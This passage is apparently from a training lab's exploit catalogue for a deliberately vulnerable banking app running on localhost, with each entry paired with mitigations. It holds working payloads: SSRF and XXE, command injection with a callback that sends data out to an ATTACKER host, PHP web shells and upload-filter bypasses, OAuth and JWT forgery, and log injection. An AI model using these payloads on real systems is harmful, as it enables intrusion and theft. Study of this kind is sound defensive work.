  for t in $(seq 1000 9999); do
    s=$(curl -s -o /dev/null -w '%{http_code}' \
      -d "email=alice.chen@gmail.com&token=$t&password=Pwned1!" http://localhost:3001/reset)
    [ "$s" = "302" ] && echo "token=$t" && break
  done

MITIGATION
  128-bit URL-safe random tokens, single-use, 15-min TTL, hashed at rest,
  delivered only via email/SMS.

--------------------------------------------------------------------------------
 [23] User enumeration — login + reset messages
--------------------------------------------------------------------------------
EXPLOIT
  POST /login   -> "No such user." vs "Password incorrect."
  POST /forgot  -> "No account with that email."

MITIGATION
  Return identical text and status codes for both states. Run a dummy hash
  check even when the user does not exist.

--------------------------------------------------------------------------------
 [24] SSRF — webhook validation + statement import
--------------------------------------------------------------------------------
Endpoints:  POST /webhooks, POST /statements/import

EXPLOIT
  # Cloud metadata (AWS):
  curl -b cookies -d 'url=http://169.254.169.254/latest/meta-data/iam/security-credentials/' \
    http://localhost:3001/statements/import
  # Internal port scan:
  for p in 22 80 443 5432 6379; do
    curl -s -b cookies -d "url=http://127.0.0.1:$p" \
      http://localhost:3001/statements/import | head -c 40
  done

MITIGATION
  Resolve the URL, reject RFC-1918 / loopback / link-local addresses
  (DNS rebind-safe: verify the resolved IP, then connect to that IP with
  Host header). Use a network egress allow-list.

--------------------------------------------------------------------------------
 [25] XXE — XML statement import
--------------------------------------------------------------------------------
Endpoint:   POST /statements/import-xml (Content-Type: application/xml)

EXPLOIT (file read on UNIX-like containers)
  curl -b cookies -H 'Content-Type: application/xml' \
    --data-binary @- http://localhost:3001/statements/import-xml <<'XML'
  <?xml version="1.0"?>
  <!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <r>&xxe;</r>
  XML

  EXPLOIT (SSRF via XXE)
  <!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
  <r>&xxe;</r>

MITIGATION
  Disable DOCTYPE processing. Use a parser configured with
  `disallow-doctype-decl=true` and no external entity resolution.

--------------------------------------------------------------------------------
 [26] Path traversal — /statements/file?name=
--------------------------------------------------------------------------------
EXPLOIT
  curl -b cookies 'http://localhost:3001/statements/file?name=../../../../etc/hosts'
  curl -b cookies 'http://localhost:3001/statements/file?name=../../seed.js'

MITIGATION
  Resolve to absolute path; reject if not within the uploads directory:
    const safe = path.resolve(UPLOAD_DIR, name);
    if (!safe.startsWith(UPLOAD_DIR + path.sep)) return 403;

--------------------------------------------------------------------------------
 [27] Arbitrary file upload
--------------------------------------------------------------------------------
EXPLOIT
  # Drop a webshell (works because Node serves /uploads statically and any
  # admin who clicks a "PDF" link will execute the redirect/JS)
  echo '<html><script>alert(document.cookie)</script>' > evil.html
  curl -b cookies -F 'file=@evil.html' -F 'account_id=1' \
    http://localhost:3001/statements/upload
  # Stored at http://localhost:3001/uploads/evil.html

MITIGATION
  Validate content-type AND magic bytes; rename to a server-generated name;
  serve from a separate hostname with `Content-Disposition: attachment` and a
  conservative CSP.

--------------------------------------------------------------------------------
 [28] Excessive data exposure — /api/me
--------------------------------------------------------------------------------
EXPLOIT
  curl -H "Authorization: Bearer $TOKEN" http://localhost:3001/api/me
  # Returns password_md5 + ssn + dob.

MITIGATION
  Pick fields explicitly in the SQL or a serialiser layer:
    SELECT id, username, email, full_name FROM users WHERE id = ?

--------------------------------------------------------------------------------
 [29] BOLA — /api/users/:id, /api/accounts/:id
--------------------------------------------------------------------------------
EXPLOIT
  curl -H "Authorization: Bearer $TOKEN" http://localhost:3001/api/users/2
  for i in 1..20; do curl ".../api/accounts/$i"; done

MITIGATION
  Enforce `id === jwt.sub` for the user route, and that the account belongs
  to `jwt.sub` for account routes.

--------------------------------------------------------------------------------
 [30] Improper inventory — /api/v1/users unauth
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/api/v1/users      # no auth required

MITIGATION
  Retire old API versions; require auth on every route by middleware default.

--------------------------------------------------------------------------------
 [30a-e] API Security additions (Chapter 20) — routes/api.js
--------------------------------------------------------------------------------
The app is API-backed, so you CAPTURE real requests by using it (no guessing):
  - Sign in, open Profile  -> the page calls  GET /api/me  (your BASE request) and,
    on "Update contact details",  PUT /api/users/<you>  (mass-assignment target).
  - Open Transfer -> "Instant transfer (app)" sends  POST /api/transfers .
  These use a session->v1 token bridge:  GET /api/token  (HS256, sub/role of the
  session).  All of them land in Reqlore's History; you then send-to-tool + mutate.
Discovery:  GET /api/openapi.json (no auth) lists every endpoint incl the admin
            and legacy ones AND their request-body schemas (Transfer, UserPatch,
            Batch, RoleChange), so the body FORMAT is read from the spec, not invented;
            GET /api/v1/users (no auth) enumerates users+roles.
Auth:       v1 JWT via the UI (GET /api/token while signed in) or POST /api/login
            (alice.chen/Password123!); alg=none forgery works (Ch 18). Admin is
            julie.morgan (sub 6).

  [30a] URC (API4) — POST /api/batch
    curl -s -X POST localhost:3001/api/batch -H "Authorization: Bearer $T" \
      -H 'Content-Type: application/json' -d '{"ids":[1,2,3,4,5]}'
    # one request loops a DB read per id, no cap -> amplification + BOLA at scale (ssn).

  [30b] BFLA (API5) — /api/admin/users + /api/admin/users/:id/role
    curl -s localhost:3001/api/admin/users -H "Authorization: Bearer $T"        # customer token -> 200
    curl -s -X POST localhost:3001/api/admin/users/1/role -H "Authorization: Bearer $T" \
      -H 'Content-Type: application/json' -d '{"role":"admin"}'                  # self-promote to admin

  [30c] Sensitive flow (API6) — POST /api/transfers
    curl -s -X POST localhost:3001/api/transfers -H "Authorization: Bearer $T" \
      -H 'Content-Type: application/json' \
      -d '{"from_account":"4002-9999-0001","to_account":"4002-1188-0001","amount_cents":100000000}'
    # no ownership/limit/idempotency -> drain the $1,000,000 audit account; replayable.

  [30d] Unsafe consumption (API10) / SSRF (API7) — GET /api/fx?provider=
    curl -s "localhost:3001/api/fx?to=EUR&amount=100&provider=http://<attacker>/rates.json" \
      -H "Authorization: Bearer $T"
    # fetches the caller-named URL (SSRF) and trusts its {rates:{EUR:...}} verbatim (no schema/bounds).

  [30e] Improper inventory (API9) — public OpenAPI spec
    curl -s localhost:3001/api/openapi.json     # full endpoint catalogue, no auth

MITIGATION
  Object + function authz on every endpoint (id===jwt.sub / role gate); cap arrays
  + paginate + rate-limit; ownership/limit/idempotency on money movement; allow-list
  outbound hosts + validate upstream responses; retire/auth old surface; hide the spec.

--------------------------------------------------------------------------------
 [31] CORS — origin reflection w/ credentials
--------------------------------------------------------------------------------
EXPLOIT
  Host a page on https://evil.test that fetches /api/me with credentials:include.
  Server reflects the Origin and sets Allow-Credentials: true → response read
  by attacker JS.

MITIGATION
  Allow-list specific origins. Never combine `Allow-Origin: *` or reflection
  with `Allow-Credentials: true`.

--------------------------------------------------------------------------------
 [32] Cache poisoning — X-Forwarded-Host echoed in Link header
--------------------------------------------------------------------------------
Endpoint:   GET /admin (returns `Link: <https://<XFH>/admin>; rel="canonical"`)
            Fronted by the deliberately MISCONFIGURED `cache` service on :8001
            (see docker-compose.yml + cache/cache-proxy.js). It caches GET
            responses keyed ONLY on the URL path, so the unkeyed
            X-Forwarded-Host still changes the cached response.

EXPLOIT (header reflection)
  curl -H 'X-Forwarded-Host: attacker.com' http://localhost:3001/admin -I

EXPLOIT (real web-cache poisoning via the :8001 cache)
  # 1. Prime the cache with a preload break-out (any logged-in session):
  curl -b cookies.txt -I \
    -H 'X-Forwarded-Host: evil.example/x>; rel="preload"; as="script"</bait' \
    http://localhost:8001/admin        # -> X-Cache: MISS, poisoned Link stored
  # 2. Victim (cookie-less) fetches the same path:
  curl -I http://localhost:8001/admin  # -> X-Cache: HIT, same poisoned Link
  A browser receiving `rel="preload"; as="script"` fetches and RUNS the
  attacker script in the bank's origin.

MITIGATION
  Don't trust upstream proxy headers unless you control the proxy. Compute
  the canonical URL from a configured base, not from request headers. Vary
  the cache on X-Forwarded-Host (and Host), or strip it at the edge.

--------------------------------------------------------------------------------
 [33] Debug endpoint exposed
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/debug   # leaks env vars, headers, session, cwd

MITIGATION
  Gate behind `NODE_ENV !== 'production'` or remove entirely. Better: feature
  flag via signed admin role check.

--------------------------------------------------------------------------------
 [34] Verbose error pages
--------------------------------------------------------------------------------
EXPLOIT
  Trigger any error (malformed query) — full stack trace + file paths leak.

MITIGATION
  In production: generic message + correlation ID. Log full details server-side.

--------------------------------------------------------------------------------
 [35] Source-map disclosure
--------------------------------------------------------------------------------
EXPLOIT
  curl http://localhost:3001/static/js/app.js.map
  # Includes original TypeScript w/ STRIPE_KEY, INTERNAL_GATEWAY, HMAC_SECRET.

MITIGATION
  Don't publish `.map` files in production, or restrict by IP / auth.

--------------------------------------------------------------------------------
 [36] Secret in JS bundle
--------------------------------------------------------------------------------
EXPLOIT
  grep -oE 'sk_live_[A-Za-z0-9_]+' /static/js/app.js

MITIGATION
  Never embed server-side secrets in client bundles. Use `NEXT_PUBLIC_*` /
  `VITE_*` style prefix conventions + secret scanning in CI.

--------------------------------------------------------------------------------
 [37] Sensitive data over HTTP — no HSTS / Secure cookie
--------------------------------------------------------------------------------
MITIGATION
  Serve only over HTTPS; set `Strict-Transport-Security: max-age=31536000;
  includeSubDomains; preload`. Mark cookies `Secure`.

--------------------------------------------------------------------------------
 [38] Insecure session cookie
--------------------------------------------------------------------------------
EXPLOIT
  console.log(document.cookie) — sid cookie readable from JS (HttpOnly=false).

MITIGATION
  Set cookie flags: `httpOnly: true, secure: true, sameSite: 'lax'`.

--------------------------------------------------------------------------------
 [39] Business logic — negative-amount transfer
--------------------------------------------------------------------------------
EXPLOIT
  /transfer/send?from=<victim>&to=<mine>&amount=-100000
  Negative subtraction increases source; addition decreases dest? Depending
  on signs — try both. Without server-side `amount > 0` check, you can
  rearrange balances.

MITIGATION
  Validate `amount > 0`, `from != to`, `currency` matches, daily caps.

--------------------------------------------------------------------------------
 [40] Vulnerable component — jQuery 1.12.4
--------------------------------------------------------------------------------
CVEs:  CVE-2015-9251 (XSS via $.parseHTML), CVE-2019-11358 (proto pollution
       via $.extend), CVE-2020-11022/11023 ($.html injection)

MITIGATION
  Upgrade to jQuery 3.7+ or remove jQuery. Add `retire.js` to CI.

--------------------------------------------------------------------------------
 [41] Audit logging — no failed-login records
--------------------------------------------------------------------------------
EXPLOIT
  Spray 10 000 logins — audit_log table stays empty.

MITIGATION
  Log every auth event (success/fail) with reason, IP, UA, request_id.

--------------------------------------------------------------------------------
 [42] Information leak — admin views return password_md5 + SSN
--------------------------------------------------------------------------------
EXPLOIT
  GET /admin/users/1 → JSON includes password_md5, ssn, reset_token.

MITIGATION
  Even for admins, don't expose hashes or full PII without a redaction layer
  and audit trail. Never expose a reset token after issuance.


--------------------------------------------------------------------------------
 [43] OAuth - lax redirect_uri (prefix match)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize, POST /oauth/token
Files:      routes/oauth.js (redirectUriAllowed: uses startsWith)
Discovery:  The whole OAuth surface is reachable from the bank UI: sign in ->
            Settings -> Connected apps & API access (/connected) -> "Sign in with
            NovaTrust" -> the demo Partner Portal (/partners/demo-app), which
            starts the authorization-code flow (authorize + callback land in
            History). Also GET /.well-known/openid-configuration for the map.

EXPLOIT
  # Registered redirect_uri: http://localhost:3001/partners/demo-app/callback
  # Attacker appends a hostile suffix that startsWith() accepts:
  curl -i -b cookies.txt \
    "http://localhost:3001/oauth/authorize?client_id=partner-portal&response_type=code&scope=openid&redirect_uri=http%3A%2F%2Flocalhost%3A3001%2Fpartners%2Fdemo-app%2Fcallback.evil.example%2F&state=x"
  # IdP issues a code and redirects to the attacker host.

MITIGATION
  Compare redirect_uri with exact string equality. Reject query strings and
  fragments unless explicitly registered.

--------------------------------------------------------------------------------
 [44] OAuth - state parameter ignored at RP callback
--------------------------------------------------------------------------------
Endpoint:   GET /partners/demo-app/callback

EXPLOIT
  Attacker logs in to NovaTrust, requests a code for themselves, then sends
  the victim:
    http://localhost:3001/partners/demo-app/callback?code=<ATTACKER_CODE>&state=anything
  The RP exchanges the code, decodes the id_token, and signs the victim in
  AS THE ATTACKER (account-stitch attack).

MITIGATION
  Bind state to the RP's session before /authorize; verify on the callback.

--------------------------------------------------------------------------------
 [45] OAuth - implicit flow (token in URL fragment)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize?response_type=token (or token id_token)

EXPLOIT
  Tokens are returned as URL fragments, exposing them to browser history,
  Referer headers (if the callback page contains an outbound link), and to
  any JS running on the callback page.

MITIGATION
  Drop implicit flow. Require response_type=code with PKCE for SPAs.

--------------------------------------------------------------------------------
 [46] OAuth - PKCE code_challenge_method=plain accepted
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token

EXPLOIT
  Attacker observes the authorization request (browser history, Referer,
  proxy logs) and extracts code_challenge. They submit the same value as
  code_verifier and pass PKCE.

MITIGATION
  Require code_challenge_method=S256. Reject plain.

--------------------------------------------------------------------------------
 [47] OAuth - authorization code reusable, 24h TTL
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token

EXPLOIT
  Capture the code (via referer leak, proxy log, lax redirect_uri, etc.).
  Replay it any time within 24 hours to mint new tokens.

MITIGATION
  Single-use codes; invalidate on first exchange. RFC 6749 mandates 10-minute
  max TTL. Bind code to client_id and redirect_uri.

--------------------------------------------------------------------------------
 [48] OAuth - id_token alg=none accepted
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize (id_token_signing_alg=none), and RP callback

EXPLOIT
  Client requests:
    /oauth/authorize?...&id_token_signing_alg=none
  IdP emits an unsigned id_token (header.alg=none, empty signature).
  Demo RP decodes it without verifying alg. An attacker who can MitM the
  callback can forge an unsigned id_token claiming any user.

MITIGATION
  Hardcode supported algorithms server-side (HS256, RS256, ES256). Reject
  alg=none and disable alg-confusion (e.g. HS256 with the RSA public key).

--------------------------------------------------------------------------------
 [49] OAuth - /userinfo ignores scope
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/userinfo

EXPLOIT
  Request a token with scope=openid only. Then:
    curl -H "Authorization: Bearer $T" http://localhost:3001/oauth/userinfo
  Response includes ssn, dob, phone_number, address, and role - all PII.

MITIGATION
  Map scopes to claim sets. openid -> sub only; email -> +email; profile ->
  +name, +preferred_username; etc. Never return SSN or DOB unless the scope
  was explicitly granted and consented to.

--------------------------------------------------------------------------------
 [50] OAuth - nOAuth (prompt=none + login_hint = ATO)
--------------------------------------------------------------------------------
Endpoint:   GET /oauth/authorize?prompt=none&login_hint=<victim_email>

EXPLOIT
  Attacker (authenticated as themselves) requests:
    /oauth/authorize?...&prompt=none&login_hint=victim@bank.test
  IdP issues an id_token whose `email` claim is the victim's email, but the
  `sub` belongs to the attacker. The RP merges accounts by `email` and signs
  the attacker in AS THE VICTIM. (Real bug class: nOAuth, 2023.)

MITIGATION
  Merge accounts by `sub`, never by `email`. Treat `email_verified` as a
  hint only; re-verify with a fresh email-confirmation flow.

--------------------------------------------------------------------------------
 [51] OAuth - ROPC grant on public client
--------------------------------------------------------------------------------
Endpoint:   POST /oauth/token (grant_type=password)

EXPLOIT
  curl -X POST http://localhost:3001/oauth/token \
    -d 'grant_type=password&username=alice.chen&password=Password123!&scope=openid&client_id=novatrust-mobile'
  No client_secret required - plaintext password to a "third-party" client.

MITIGATION
  Remove ROPC (deprecated by OAuth 2.1). Require redirect-based flows.

--------------------------------------------------------------------------------
 [52] OAuth - predictable refresh tokens
--------------------------------------------------------------------------------
EXPLOIT
  echo -n "1:1718999999999" | base64
  # MToxNzE4OTk5OTk5OTk5
  # Submit as refresh_token: time-ranged brute force is feasible because the
  # token is base64(user_id ':' epoch_ms).

MITIGATION
  refresh_token must be cryptographically random and at least 128 bits of
  entropy. Rotate on every use. Bind to client_id, scope and (optionally)
  device fingerprint.


--------------------------------------------------------------------------------
 [53] Security misconfig — /.env at web root
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  GET /.env
CHAPTER 33

EXPLOIT
  curl -s http://localhost:3001/.env
  # Returns DB creds, JWT secret, AWS/Stripe/SendGrid keys, INTERNAL_ADMIN_*.

MITIGATION
  Never deploy a `.env` next to served content. If the framework or build
  step copies it, add a deny rule in nginx/Apache: `location ~ /\\. { deny all; }`.
  Use a secrets manager (Vault, AWS Secrets Manager, GitHub Actions secrets)
  and inject at runtime.

--------------------------------------------------------------------------------
 [54] Security misconfig — /.git/ exposed
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  express.static mount on /.git
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/.git/HEAD          # ref: refs/heads/main
  curl http://localhost:3001/.git/config        # remote URL + user identity
  curl http://localhost:3001/.git/refs/heads/main
  # Real campaigns then run `git-dumper` to pull every object and recover
  # the full source tree (including secrets later "rotated").

MITIGATION
  Build artefact must NOT contain `.git/`. Add to .dockerignore and to the
  deploy bundle exclude list. Web server: `location ~ /\\.git { deny all; }`.

--------------------------------------------------------------------------------
 [55] Security misconfig — /internal/dashboard default creds admin:admin
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  GET /internal/dashboard  (HTTP Basic Auth)
CHAPTER 33

EXPLOIT
  curl -i http://localhost:3001/internal/dashboard            # 401 WWW-Authenticate
  curl -u admin:admin http://localhost:3001/internal/dashboard
  # Returns the internal ops panel with restart-db / flush-cache / debug links.

MITIGATION
  Move ops dashboards behind SSO + MFA + IP allow-list. Never accept default
  credentials; rotate-on-first-login + complexity policy. Lock /internal/* at
  the load balancer to corporate VPN ranges only.

--------------------------------------------------------------------------------
 [56] Security misconfig — verbose Server + X-Powered-By banner
--------------------------------------------------------------------------------
SINK   server.js  Server header middleware
CHAPTER 33

EXPLOIT
  curl -I http://localhost:3001/login | grep -iE 'server|x-powered'
  # Server: nginx/1.18.0 (Ubuntu) + Express/4.19.2
  # X-Powered-By: Express
  # Attacker now knows the exact stack and looks up CVEs for that version.

MITIGATION
  `app.disable('x-powered-by')`. Strip Server in nginx with `server_tokens off`.
  Don't advertise version numbers anywhere. Patch instead.

--------------------------------------------------------------------------------
 [57] Security misconfig — backup file /static/backup/admin.js.bak
--------------------------------------------------------------------------------
SINK   data/exposed/admin.js.bak  +  routes/misconfig.js
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/static/backup/admin.js.bak
  # Reveals the hard-coded X-Support-Token primitive used by [58].

MITIGATION
  Never copy backup/temp files into the deploy bundle. Block common suffixes
  at the proxy: `.bak`, `.old`, `.orig`, `.swp`, `~`, `.tar.gz`, `.zip`.

--------------------------------------------------------------------------------
 [58] Security misconfig — support-token bypass header
--------------------------------------------------------------------------------
SINK   routes/admin.js  X-Support-Token middleware
CHAPTER 33

EXPLOIT
  curl -s -o /dev/null -w '%{http_code}\\n' http://localhost:3001/admin
  # 302 (redirect to login)
  curl -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' http://localhost:3001/admin
  # 200 — admin dashboard with no login at all.

MITIGATION
  Remove all "magic header" bypass paths. Production code should never trust
  a static, shareable string for privilege elevation. If support tooling
  needs elevated access, use short-lived signed tokens scoped per request
  and audit-logged.

--------------------------------------------------------------------------------
 [59] Security misconfig — CORS reflected origin + credentials on /api
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  corsReflect middleware on /api
CHAPTER 33

EXPLOIT
  curl -i -H 'Origin: https://attacker.example' http://localhost:3001/api/me
  # Access-Control-Allow-Origin: https://attacker.example
  # Access-Control-Allow-Credentials: true
  # A page on attacker.example can fetch('/api/me', {credentials:'include'})
  # and read the JSON response.

MITIGATION
  Use an explicit allow-list of trusted origins. If credentials are needed,
  Allow-Origin must be a single fixed origin, NEVER a wildcard or reflection.

--------------------------------------------------------------------------------
 [60] Security misconfig — /uploads/ directory listing enabled
--------------------------------------------------------------------------------
SINK   routes/misconfig.js  listingMiddleware on /uploads
CHAPTER 33

EXPLOIT
  curl http://localhost:3001/uploads/
  # HTML listing of every other tenant's uploaded file.

MITIGATION
  Disable autoindex on every static mount (Express does not enable it; this
  lab opted in intentionally). For nginx, ensure `autoindex off;`. Store user
  uploads behind a permission-checked download route, not directly served.


--------------------------------------------------------------------------------
 [61] Vulnerable component — jQuery 1.12.4 `$()` HTML parsing
--------------------------------------------------------------------------------
SINK   public/js/app.js  applyTheme() IIFE
CHAPTER 34

The bank loads public/vendor/jquery-1.12.4.min.js in
views/partials/header.ejs. app.js reads ?theme= from
window.location.search and passes it to `$()`. Any string
starting with `<` is parsed as HTML and turned into real DOM
nodes -- including <img onerror=...>, which fires in the
browser when the src 404s.

EXPLOIT
  Browse (in a real browser, not curl):
    http://localhost:3001/accounts?theme=<img src=x onerror=alert(1)>
  Or unauthenticated on /register:
    http://localhost:3001/register?theme=<img src=x onerror=alert(1)>

VERIFY without a browser (jsdom):
  See book/chapters/34-vulnerable-and-outdated-components.md Section 5.1.

MITIGATION
  - Upgrade jQuery to >= 3.5.0 (CVE-2020-11022, CVE-2020-11023 patched).
  - Never pass user input to `$()`. If you need to set HTML, use `.text()`
    or wrap with `DOMPurify.sanitize(...)`.
  - CSP: `script-src 'self'` blocks the inline `onerror=` payload.


--------------------------------------------------------------------------------
 [62] Software & Data Integrity — unsigned plugin install → RCE
--------------------------------------------------------------------------------
SINK   routes/integrity.js (B-INT-001)
MOUNT  app.use('/admin/integrity', require('./routes/integrity'))

The "Plugin Studio" endpoint accepts arbitrary JavaScript and
`require()`s it into the running bank process. The handler validates
only the plugin *name* (filename charset) — never the *bytes*. There
is no signature, no checksum, no allow-list of authors, no SBOM.

EXPLOIT (no auth required — the route is not behind requireSession)
  curl -s -X POST http://localhost:3001/admin/integrity/install \
    -H 'Content-Type: application/json' \
    -d '{"name":"pwn1","code":"module.exports={init:()=>require(\"child_process\").execSync(\"whoami\").toString().trim()};"}'
  # => {"installed":"pwn1","init":"REDMOND+t-ibadawy"}

LIST installed plugins:
  curl -s http://localhost:3001/admin/integrity/list

WHY THIS IS A08 (not just "RCE")
  A08 Software & Data Integrity Failures covers code & data shipped into
  the application without verifying its origin or integrity. This sink
  is the lab analog of:
    - npm install of a typosquat / hijacked maintainer (event-stream 2018)
    - SolarWinds Orion build-server tampering (2020)
    - Codecov bash uploader supply-chain tampering (2021)

MITIGATION
  - Require detached signatures (sigstore/cosign, GPG, or in-house Ed25519)
    over the plugin tarball and verify before `require()`.
  - Pin a SHA-256 allow-list of approved plugins.
  - Run plugins in a separate process / sandbox (vm2 is deprecated; use
    `node --experimental-permission` or a child process with restricted env).
  - Authenticate the endpoint and audit-log every install with the signer
    identity (Ch 36).


--------------------------------------------------------------------------------
 [63] Logging & Monitoring failures
--------------------------------------------------------------------------------
SINKS  lib/audit.js  +  routes/auth.js  +  routes/admin.js
TABLE  audit_log (id, user_id, action, details, created_at)

Four overlapping gaps make the bank a textbook A09 target:

  B-LOG-001  Failed logins are NOT audited.
             routes/auth.js calls audit() only on success.  An
             attacker can iterate the entire password list against a
             single account and leave zero entries behind.
  B-LOG-002  Reading /admin/users/:id (which returns the full row
             including SSN and password hash) is NOT audited, and
             /admin/users/:id/delete (account deletion) is NOT audited.
             Mass SSN enumeration and account wiping are invisible.
  B-LOG-003  The `details` column is built from raw request bytes.
             A newline (or CRLF) inside the value -- e.g. in the
             /forgot `email` parameter -- forges additional log lines
             that the defender will read as legitimate audit entries.
  B-LOG-004  GET /admin/audit has no role check (the surrounding
             /admin router uses only requireSession).  Any logged-in
             user (or anyone with the leaked X-Support-Token) can
             read the defender's own log.

EXPLOIT  (no auth needed -- support-token bypass from B-MIS-006)
  # 10 failed login attempts, all 401, NONE recorded:
  for i in 1 2 3 4 5 6 7 8 9 10; do
    curl -s -o /dev/null -X POST http://localhost:3001/login \
      -d "username=alice.chen&password=wrong$i"
  done
  # one success -- IS recorded
  curl -s -o /dev/null -X POST http://localhost:3001/login \
    -d 'username=alice.chen&password=Password123!'

  # 5 SSNs dumped, NONE recorded:
  for id in 1 2 3 4 5; do
    curl -s -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' \
      http://localhost:3001/admin/users/$id
  done

  # Defender reads /admin/audit -- they see 'login_success' and the
  # seed row only:
  curl -s -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' \
    http://localhost:3001/admin/audit

LOG INJECTION  (CRLF forgery via /forgot)
  curl -s --data-urlencode $'email=victim@x.com\n2099-01-01T00:00:00 | 1 | login | admin login from 8.8.8.8' \
    http://localhost:3001/forgot
  # /admin/audit now displays a forged "admin login from 8.8.8.8"
  # row that no one performed.

MITIGATION
  - Audit BOTH success AND failure (especially failure -- it is the
    interesting signal).  Include actor IP and User-Agent.
  - Sanitise log inputs.  Strip or escape \r, \n and any control
    bytes BEFORE concatenating into the `details` field.
  - Add a real role guard to /admin/audit (requireAdmin) AND treat the
    audit log as append-only with periodic export to a write-once
    store outside the app.
  - Alert on patterns: N failed logins from one IP, M SSN reads in
    one minute, audit_log write failures.


--------------------------------------------------------------------------------
 [65] OS command injection — /admin/diagnostics ?host=
--------------------------------------------------------------------------------
Endpoint:   GET /admin/diagnostics?host=<HOST>
Files:      routes/admin.js (diagnostics handler), views/diagnostics.ejs
Auth:       admin session, OR header  X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS

WHY IT IS VULNERABLE
  The handler builds   `ping -c 1 -W 2 ${host}`   and runs it through
  execSync(cmd, { shell: '/bin/sh' }). The host string is never validated, so
  any shell metacharacter in ?host= is interpreted by /bin/sh.

EXPLOIT (chain a second command)
  curl -H 'X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS' \
    'http://localhost:3001/admin/diagnostics?host=127.0.0.1;id'
  Other separators all work:
    127.0.0.1 | id
    127.0.0.1 && cat /etc/passwd
    $(whoami)
    `uname -a`
  Blind/OOB variant (no output reflected):
    127.0.0.1; curl http://ATTACKER/$(id|base64)

MITIGATION
  Never build a shell string from user input. Pass arguments as a vector and
  skip the shell entirely:
    execFile('ping', ['-c', '1', '-W', '2', host])   // no shell
  Plus: validate `host` against a hostname/IP allow-list.

--------------------------------------------------------------------------------
 [66] XPath injection — /admin/directory ?name=
--------------------------------------------------------------------------------
Endpoint:   GET /admin/directory?name=<NAME>
Files:      routes/admin.js (directory handler), data/staff-directory.xml,
            views/directory.ejs
Auth:       admin session, OR header  X-Support-Token: ENG-OVERRIDE-2024-ALL-ACCESS

WHY IT IS VULNERABLE
  The handler builds the XPath  //employee[username/text()='${name}']  and runs
  it against staff-directory.xml. A closed quote lets the attacker rewrite the
  predicate. The XML holds hidden  <clearance>  and  <api_token>  fields (e.g.
  nt_live_root_0000deadbeefcafe) that the template never prints — but they are
  reachable through the injected expression.

EXPLOIT
  Return every employee:
    ?name=' or '1'='1
  Boolean oracle (blind):
    ?name=nobody' or count(//employee)>3 or 'a'='b
  Confirm the backup service-account token starts with 'nt_live_root':
    ?name=nobody' or //employee[username/text()='svc-backup' and
          starts-with(api_token/text(),'nt_live_root')] or 'a'='b
  Node-set union to surface tokens in the result rows:
    ?name='] | //employee/api_token | a['

MITIGATION
  Use a parameterised/precompiled XPath that binds the value out of band
  (xpath.parse(expr).evaluate with a variable resolver), or strictly escape
  quotes. Better: stop storing secrets next to directory data.

================================================================================
 [65] File upload → RCE — NovaTrust Applications Center (PHP portal, :3010)
================================================================================
Base URL:   http://localhost:3010  (reached from the bank's "Apply" nav link
            once signed in; own docker-compose service `applyportal`, PHP/Apache)
Why RCE:    Apache runs .php AND .phtml/.pht/.php5/.phar, AllowOverride All,
            Options +Indexes. Saved documents live under docs/<form>/ and the
            folders directory-list. Five business forms, escalating filters:

  loan.php      Personal Loan / pay stub      — NO validation.
                Upload paystub.php = <?php $cmd=$_GET['cmd']; system($cmd); ?>
                GET /docs/loan/paystub.php?cmd=id  -> uid=33(www-data)

  card.php      Credit Card / photo ID        — extension BLOCK-LIST that omits
                .phtml and .phar (Apache still runs them).
                Upload id.phtml -> GET /docs/card/id.phtml?cmd=id -> RCE

  mortgage.php  Mortgage / appraisal          — trusts the multipart part's
                Content-Type ($_FILES[..]['type']).
                filename=appraisal.php + Content-Type: image/png -> RCE

  verify.php    Identity Verification / selfie — getimagesize() magic bytes +
                block-list. Beat with a polyglot: bytes "GIF89a\n<?php ... ?>"
                named selfie.phtml -> GET /docs/verify/selfie.phtml?cmd=id -> RCE

  dispute.php   Dispute a Charge / receipt    — COMPLETE script block-list
                (.phtml/.phar/.svg/.html all blocked) BUT AllowOverride All.
                Upload 1  filename=.htaccess :
                   <FilesMatch "receipt\.jpg$">
                   SetHandler application/x-httpd-php
                   </FilesMatch>
                Upload 2  receipt.jpg = GIF89a polyglot web shell (jpg allowed).
                GET /docs/dispute/receipt.jpg?cmd=id -> RCE (CVE-2018-9206 shape)

TESTED (isolated container, no shell on host disk):
  docker run --rm -i --network vuln-bank_default alpine sh
  All five reach uid=33(www-data); naive attempts are blocked.

MITIGATION
  Store uploads outside the web root; serve as attachments with a fixed
  Content-Type from a cookieless origin; random name + server-chosen extension
  from a byte-level type check (re-encode images); AllowOverride None, remove
  the PHP handler from the upload path; disable directory listing.

================================================================================
 Reproducibility note
================================================================================
After exploitation, reset the lab with:
   rm -rf data/   # or `Remove-Item -Recurse -Force data`
   node seed.js
or just stop the server and re-run `./run.ps1` (auto-reseeds on empty DB).